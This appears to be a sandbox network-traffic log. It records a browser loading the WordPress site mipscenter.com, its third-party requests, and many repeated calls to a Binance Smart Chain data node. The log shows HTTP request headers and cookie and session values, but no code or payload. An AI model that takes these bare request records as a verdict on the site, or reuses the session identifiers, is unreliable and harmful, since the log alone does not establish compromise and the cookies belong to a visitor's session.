Source: global trafficHTTP traffic detected: GET /mipscenter.com/wp-content/uploads/2021/03/favicon.png?resize=300%2C300&ssl=1 HTTP/1.1Host: i0.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-117802564-8&cid=875376301.1743111908&jid=264669138&gjid=645787295&_gid=157563918.1743111908&_u=YGBAiEABBAAAAGAAI~&z=1403924468 HTTP/1.1Host: stats.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /vi_webp/LUgFEp-Aczk/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/player/8a8ac953/player_ias.vflset/en_US/remote.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/embed/LUgFEp-AczkAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: YSC=x-wRkeS1hmE; __Secure-ROLLOUT_TOKEN=CPa41ZfDsfCEbhCOn6nxnauMAxiOn6nxnauMAw%3D%3D; VISITOR_INFO1_LIVE=ZLYEpCx924k; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgWg%3D%3D
Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.youtube.comX-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /js/th/hgpDEIezn5_YHp8Re5SvIX7R8qI3E-hmdIkWVp5PtFA.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ytc/AIdro_kcSUx4AUb3Ynub5dgqznmhyOtqJl0y0l5_u7tdNuUO=s68-c-k-c0x00ffffff-no-rj HTTP/1.1Host: yt3.ggpht.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.youtube.comX-Client-Data: CLf3ygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /vi_webp/LUgFEp-Aczk/sddefault.webp HTTP/1.1Host: i.ytimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ytc/AIdro_kcSUx4AUb3Ynub5dgqznmhyOtqJl0y0l5_u7tdNuUO=s68-c-k-c0x00ffffff-no-rj HTTP/1.1Host: yt3.ggpht.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /generate_204?Vie2MA HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLf3ygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.youtube.com/embed/LUgFEp-AczkAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: YSC=x-wRkeS1hmE; __Secure-ROLLOUT_TOKEN=CPa41ZfDsfCEbhCOn6nxnauMAxiOn6nxnauMAw%3D%3D; VISITOR_INFO1_LIVE=ZLYEpCx924k; VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgWg%3D%3D
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget.js HTTP/1.1Host: services.ohmd.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A08.726Z&hit_id=add2f83d-e361-440c-b491-2ad4c82edf84&ht=pageview&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=1806072875 HTTP/1.1Host: events.api.secureserver.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://mipscenter.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A12.018Z&hit_id=d920f60c-01ae-4ef4-a06b-968e52577f72&ea=pageperf&ht=perf&eid=traffic.tcc.instrumentation.navigation.timing&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=1638016116&tce=1743111902918&tcs=1743111902728&tdc=1743111911986&tdclee=1743111907849&tdcles=1743111907837&tdi=1743111905030&tdl=1743111903165&tdle=1743111902728&tdls=1743111902728&tfs=1743111902481&tns=1743111902467&trqs=1743111902918&tre=1743111903357&trps=1743111903156&tles=1743111911986&tlee=0&nt=navigate&LCP=6232&nav_type=hard HTTP/1.1Host: events.api.secureserver.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://mipscenter.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /temp HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906; _ga=GA1.2.875376301.1743111908; _gid=GA1.2.157563918.1743111908; _dc_gtm_UA-117802564-8=1; _tccl_visitor=a448cdd8-0a30-490d-9777-f465e4a15f12; _tccl_visit=a448cdd8-0a30-490d-9777-f465e4a15f12; _scc_session=pc=1&C_TOUCH=2025-03-27T21:45:08.726Z; _ga_212GLDWB2Y=GS1.2.1743111909.1.0.1743111909.0.0.0
Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A12.018Z&hit_id=d920f60c-01ae-4ef4-a06b-968e52577f72&ea=pageperf&ht=perf&eid=traffic.tcc.instrumentation.navigation.timing&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=1638016116&tce=1743111902918&tcs=1743111902728&tdc=1743111911986&tdclee=1743111907849&tdcles=1743111907837&tdi=1743111905030&tdl=1743111903165&tdle=1743111902728&tdls=1743111902728&tfs=1743111902481&tns=1743111902467&trqs=1743111902918&tre=1743111903357&trps=1743111903156&tles=1743111911986&tlee=0&nt=navigate&LCP=6232&nav_type=hard HTTP/1.1Host: events.api.secureserver.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /youtubei/v1/log_event?alt=json HTTP/1.1Host: www.youtube.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLf3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t/1/tl/event?dh=mipscenter.com&dr=&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36&client_name=scc-c2&cv=1.0.4&vg=a448cdd8-0a30-490d-9777-f465e4a15f12&vtg=a448cdd8-0a30-490d-9777-f465e4a15f12&dp=%2F&trace_id=0ec95676ece04a048b96bc82725e1f96&cts=2025-03-27T21%3A45%3A08.726Z&hit_id=add2f83d-e361-440c-b491-2ad4c82edf84&ht=pageview&trfd=%7B%22ap%22%3A%22wpaas_v2%22%2C%22server%22%3A%22606446c11e48%22%2C%22pod%22%3A%22c8-prod-p3-us-west-2%22%2C%22xid%22%3A%2245774621%22%2C%22wp%22%3A%226.7.2%22%2C%22php%22%3A%227.4.33.9%22%2C%22loggedin%22%3A%220%22%2C%22cdn%22%3A%221%22%2C%22builder%22%3A%22wp-classic-editor%22%2C%22theme%22%3A%22milo%22%2C%22wds%22%3A%220%22%2C%22wp_alloptions_count%22%3A%22503%22%2C%22wp_alloptions_bytes%22%3A%22153255%22%2C%22gdl_coming_soon_page%22%3A%220%22%2C%22appid%22%3A%2262671%22%7D&ap=wpaas_v2&vci=1552567263&z=1806072875 HTTP/1.1Host: events.api.secureserver.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/03/cropped-favicon-1-32x32.png HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906; _ga=GA1.2.875376301.1743111908; _gid=GA1.2.157563918.1743111908; _dc_gtm_UA-117802564-8=1; _tccl_visitor=a448cdd8-0a30-490d-9777-f465e4a15f12; _tccl_visit=a448cdd8-0a30-490d-9777-f465e4a15f12; _scc_session=pc=1&C_TOUCH=2025-03-27T21:45:08.726Z; _ga_212GLDWB2Y=GS1.2.1743111909.1.0.1743111909.0.0.0
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906; _ga=GA1.2.875376301.1743111908; _gid=GA1.2.157563918.1743111908; _dc_gtm_UA-117802564-8=1; _tccl_visitor=a448cdd8-0a30-490d-9777-f465e4a15f12; _tccl_visit=a448cdd8-0a30-490d-9777-f465e4a15f12; _scc_session=pc=1&C_TOUCH=2025-03-27T21:45:08.726Z; _ga_212GLDWB2Y=GS1.2.1743111909.1.0.1743111909.0.0.0
Source: global trafficHTTP traffic detected: GET /api/v1/widgets/96AC014A-76AF-4CB8-AC5F-9E7EF6E09765 HTTP/1.1Host: services.ohmd.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/jsonsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/jsonsec-ch-ua-mobile: ?0Origin: https://mipscenter.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/03/cropped-favicon-1-32x32.png HTTP/1.1Host: mipscenter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _gcl_au=1.1.1553177151.1743111906; _ga=GA1.2.875376301.1743111908; _gid=GA1.2.157563918.1743111908; _dc_gtm_UA-117802564-8=1; _tccl_visitor=a448cdd8-0a30-490d-9777-f465e4a15f12; _tccl_visit=a448cdd8-0a30-490d-9777-f465e4a15f12; _scc_session=pc=1&C_TOUCH=2025-03-27T21:45:08.726Z; _ga_212GLDWB2Y=GS1.2.1743111909.1.0.1743111909.0.0.0
Source: global trafficHTTP traffic detected: GET /api/v1/widgets/96AC014A-76AF-4CB8-AC5F-9E7EF6E09765 HTTP/1.1Host: services.ohmd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
